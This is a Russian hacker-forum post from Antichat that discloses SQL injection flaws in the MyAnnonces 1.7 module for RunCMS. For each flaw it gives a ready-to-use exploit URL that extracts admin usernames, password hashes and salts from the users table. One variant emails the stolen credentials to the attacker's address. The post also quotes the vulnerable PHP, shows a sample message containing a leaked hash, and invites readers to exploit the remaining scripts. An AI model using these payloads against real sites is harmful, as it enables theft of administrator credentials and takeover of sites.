|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
MyAnnonces
Версия: 1.7
Скачать: http://www.runcms.ru/modules/files/visit.php?lid=94
SQL-INJ
Уязвимый скрипт: addannonces.php
Запрос: /modules/MyAnnonces/addannonces.php?op=addindex&cid=-1+union+select+pass,2+from+runcms_users
Вместо pass поочереди подставляем uname, pwdsalt, т.к. concat заюзать не получится - срабатывает мегахаксорная зашита)
Уязвимый кусок кода:
Уязвимость можно проэксплуатировать только, если есть хоть 1 категория.
PHP код:
switch($op) {
case "addindex":
addindex($cid);
break;
PHP код:
function addindex($cid) {
..............
list($numrows) = $db->fetch_row($db->query("select cid, title from ".$db->prefix("ann_categories").""));
if ($numrows>0) {
..............
$requete = $db->query("select title, affprix from ".$db->prefix("ann_categories")." where cid=".$cid."");
list($title, $affprix) = $db->fetch_row($requete);
SQL-INJ
Уязвимый скрипт: annonces-p-f.php
Зависимость: magic_quotes = off
Запрос: /modules/MyAnnonces/annonces-p-f.php?op=EnvAnn&lid='+union+select+uname,pwdsalt,p ass+from+runcms_users%23
Уязивмый кусок кода:
PHP код:
switch($op) {
case "EnvAnn":
EnvAnn($lid);
break;
...........
function EnvAnn($lid) {
...........
$result = $db->query("SELECT lid, title, type FROM ".$db->prefix("ann_annonces")." where lid='$lid'");
list($lid, $title, $type) = $db->fetch_row($result);
echo "<B><A HREF=\"index.php\">"._CLA_MAIN."</A> » "._CLA_SENDTO." $lid \"<B>$type : $title</B>\"
Запрос: /modules/MyAnnonces/annonces-p-f.php?op=MailAnn&yname=&ymail=&fname=&fmail= blacksun@xakep.ru&lid=-1+union+select+1,pass,uname,pwdsalt,5,6,7,8,9,10,1 1,12,13+from+runcms_users
На указанный email придет письмо вида
Код:
Hello ,
thought that this advert might interest you and wanted to send it to you.
admin : dd94709528bb1c83d08f3088d4043f4742891f4f
153a
Price : 6 Ђ 7
Email address : http://localhost/runcms/modules/MyAnnonces/contact.php?lid=1
Telephone : 5
Town : 11
Country : 12
Other adverts are available in teh Classified Adverts section of Mysite
http://{SITE URL}/modules/MyAnnonces/
Уязвимый кусок кода:
PHP код:
switch($op) {
case "MailAnn":
MailAnn($lid, $yname, $ymail, $fname, $fmail);
break;
............
function MailAnn($lid, $yname, $ymail, $fname, $fmail) {
global $xoopsConfig, $xoopsUser, $db, $monnaie, $ynprice, $myts, $meta;
$result = $db->query("SELECT lid, title, type, description, tel, price, typeprix, date, email, submitter, town, country, photo FROM ".$db->prefix("ann_annonces")." where lid=$lid");
Можно обойтись и без отсылки на мыло)
Запрос: /modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uname,pwdsalt,5,6,7,8,9,10,1 1,12,13+from+runcms_users
Уязвимый кусок кода:
PHP код:
switch($op) {
case "ImprAnn":
ImprAnn($lid);
break;
..............
function ImprAnn($lid) {
global $xoopsConfig, $db, $monnaie, $useroffset, $claday, $ynprice, $myts, $meta;
$currenttheme = getTheme();
$result = $db->query("SELECT lid, title, type, description, tel, price, typeprix, date, email, submitter, town, country, photo FROM ".$db->prefix("ann_annonces")." where lid=$lid");
Флуд именами\паролями\явками своего \ чужого мыла
Уязвимый скрипт: contact.php
Зависимость: magic_quotes = off
Запрос: /modules/MyAnnonces/contact.php?submit=1&id=-1'+union+select+' blacksun@xakep.ru',2,pass,uname,pwdsalt+from+runcms_users%23
Уязвимый кусок кода:
PHP код:
if ($submit) {
include("header.php");
global $xoopsConfig, $db, $myts, $meta;
$result = $db->query("SELECT email, submitter, title, type, description FROM ".$db->prefix("ann_annonces")." WHERE lid = '$id'");
while(list($email, $submitter, $titre, $type, $description) = $db->fetch_row($result)) {
И на этом мне надоело, скриптов в этом модуле еще достаточно и все дырявые .. кто хочет - может добить.
Последний раз редактировалось BlackSun; 23.02.2009 в 13:06..
|